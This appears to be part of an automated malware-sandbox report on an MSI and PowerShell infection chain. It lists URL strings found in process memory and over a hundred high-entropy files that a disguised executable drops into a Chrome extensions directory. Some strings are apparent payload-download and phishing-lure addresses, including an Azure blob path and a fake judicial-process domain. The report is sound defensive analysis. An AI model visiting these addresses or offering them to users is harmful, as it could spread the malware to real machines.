Source: chrome.exe, 00000009.00000002.2297957579.0000000063152000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.schneier.com/paper-twofish-paper.pdf
Source: WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9CFB000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2073107385.000001CDA9DBF000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000008.00000002.2070683951.000000006626A000.00000002.00000001.01000000.00000009.sdmp, vcruntime140_1_app.dll.1.dr	String found in binary or memory: https://advocaciavirtualmw.com/ProcessosAbril/processojudiciario.gov.br
Source: WebExperienceHostApp.exe, 00000008.00000002.2070683951.000000006626A000.00000002.00000001.01000000.00000009.sdmp, vcruntime140_1_app.dll.1.dr	String found in binary or memory: https://advocaciavirtualmw.com/ProcessosAbril/processojudiciario.gov.brFMX_STYLE
Source: powershell.exe, 00000003.00000002.2007551719.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.2007551719.000000000490E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bost.blo
Source: powershell.exe, 00000003.00000002.2007551719.000000000490E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bost.blo(f
Source: Br_i421i2-2481-125_754864.msi	String found in binary or memory: https://bost.blob.core.wi
Source: powershell.exe, 00000003.00000002.2007551719.0000000004951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bost.blob.core.windows.net
Source: powershell.exe, 00000003.00000002.2007551719.000000000490E000.00000004.00000800.00020000.00000000.sdmp, scr43E3.ps1.2.dr, MSI3E49.tmp.1.dr, 4b3b29.rbs.1.dr	String found in binary or memory: https://bost.blob.core.windows.net/2205tomps/bastaodorei.mlk
Source: powershell.exe, 00000003.00000002.2010502679.000000000561E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2010502679.000000000561E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2010502679.000000000561E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000009.00000000.2061595070.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://crashpad.chromium.org/
Source: WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000009.00000000.2061595070.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://crashpad.chromium.org/bug/new
Source: WebExperienceHostApp.exe, 00000008.00000003.2017631838.00007DF4924A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000009.00000000.2061595070.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
Source: powershell.exe, 00000003.00000002.2007551719.0000000004706000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2007551719.0000000004DDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: WebExperienceHostApp.exe, 00000008.00000002.2070683951.000000006626A000.00000002.00000001.01000000.00000009.sdmp, vcruntime140_1_app.dll.1.dr	String found in binary or memory: https://jaspreser.dev.br/.well-known/acme-challenge/Relatorios_xls_mensal
Source: powershell.exe, 00000003.00000002.2010502679.000000000561E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Spam, unwanted Advertisements and Ransom Demands

Writes many files with high entropy

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\appData\24052024.zip entropy: 7.99872022431	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.30 entropy: 7.99752780953	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.31 entropy: 7.99330413873	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.32 entropy: 7.9982834495	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.33 entropy: 7.99517225944	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.34 entropy: 7.99824305433	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.35 entropy: 7.99790959486	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.36 entropy: 7.99754718991	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.37 entropy: 7.99770998551	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.38 entropy: 7.99715340846	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.39 entropy: 7.99776227345	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.4 entropy: 7.99046230266	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.40 entropy: 7.99399133173	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.41 entropy: 7.99713861921	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.42 entropy: 7.99667055392	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.43 entropy: 7.99414348537	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.44 entropy: 7.99781831277	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.45 entropy: 7.99405865581	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.46 entropy: 7.99772013622	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.47 entropy: 7.99779597898	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.48 entropy: 7.99276827367	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.49 entropy: 7.99797758594	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.5 entropy: 7.99823961145	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.50 entropy: 7.99448796462	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.51 entropy: 7.99703199099	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.52 entropy: 7.99497283467	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.53 entropy: 7.99807423749	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.54 entropy: 7.99531409722	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.55 entropy: 7.99674971497	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.56 entropy: 7.99474871603	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.57 entropy: 7.9982840934	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.58 entropy: 7.99246215184	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.59 entropy: 7.99409874979	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.6 entropy: 7.99845761566	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.60 entropy: 7.99738800393	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.61 entropy: 7.99460856626	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.62 entropy: 7.99798601902	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.63 entropy: 7.99432159953	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.64 entropy: 7.99815865014	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.65 entropy: 7.99622567341	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.66 entropy: 7.9951105294	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.67 entropy: 7.9974883893	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.68 entropy: 7.99846732736	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.69 entropy: 7.99701507902	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.7 entropy: 7.99791398394	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.70 entropy: 7.99460045101	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.71 entropy: 7.99805655456	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.72 entropy: 7.99528518128	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.73 entropy: 7.99752214025	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.74 entropy: 7.9979940302	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.75 entropy: 7.99403941576	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.1 entropy: 7.99832754142	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.10 entropy: 7.99805977047	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.100 entropy: 7.99814455019	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.101 entropy: 7.99805920411	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.102 entropy: 7.99398437537	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.103 entropy: 7.9969613831	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.104 entropy: 7.99837165529	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.105 entropy: 7.99490534733	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.76 entropy: 7.99805834668	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.77 entropy: 7.99594269497	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.78 entropy: 7.99832335849	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.79 entropy: 7.99474667993	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.8 entropy: 7.99833024695	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.80 entropy: 7.99725858533	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.81 entropy: 7.99805459791	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.82 entropy: 7.99401136409	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.83 entropy: 7.99790203419	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.84 entropy: 7.99456452064	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.106 entropy: 7.99816744472	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.107 entropy: 7.99516845459	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.109 entropy: 7.99829884537	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.11 entropy: 7.99404648214	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.110 entropy: 7.99610810388	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.111 entropy: 7.99867490099	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.112 entropy: 7.99779818478	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.113 entropy: 7.99791560708	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.114 entropy: 7.99420401473	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.85 entropy: 7.99905143323	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.86 entropy: 7.997904103	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.87 entropy: 7.99772075385	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.88 entropy: 7.99299422459	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.89 entropy: 7.99836997664	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.9 entropy: 7.99812769595	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.90 entropy: 7.993925773	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.91 entropy: 7.99668825058	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.92 entropy: 7.9981015402	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.93 entropy: 7.99479992523	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.115 entropy: 7.9976080306	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.116 entropy: 7.9941388261	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.117 entropy: 7.99835871385	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.118 entropy: 7.99471154974	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.119 entropy: 7.99780940325	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.12 entropy: 7.99573288862	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.120 entropy: 7.99419790942	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.121 entropy: 7.99820009329	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.122 entropy: 7.9935670475	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.123 entropy: 7.99877373818	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.94 entropy: 7.99806786473	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.95 entropy: 7.99503182523	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.96 entropy: 7.99820951674	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.97 entropy: 7.99366192441	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.98 entropy: 7.99841208592	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.99 entropy: 7.99474767769	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.124 entropy: 7.99782036754	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.125 entropy: 7.99790353721	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.126 entropy: 7.99795396183	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.127 entropy: 7.99819061954	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.128 entropy: 7.99578707328	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.129 entropy: 7.99767920118	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.13 entropy: 7.99555057257	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.130 entropy: 7.99448073439	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.131 entropy: 7.99785714597	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.132 entropy: 7.99495719328	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.133 entropy: 7.99787043835	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.134 entropy: 7.99409008648	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.14 entropy: 7.99685420083	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.15 entropy: 7.99814258165	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.16 entropy: 7.99514210593	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.17 entropy: 7.99802992616	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.18 entropy: 7.99426880008	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.19 entropy: 7.99804200099	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.2 entropy: 7.99839321454	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.20 entropy: 7.99482421893	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.21 entropy: 7.99819014746	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.22 entropy: 7.99506507103	Jump to dropped file
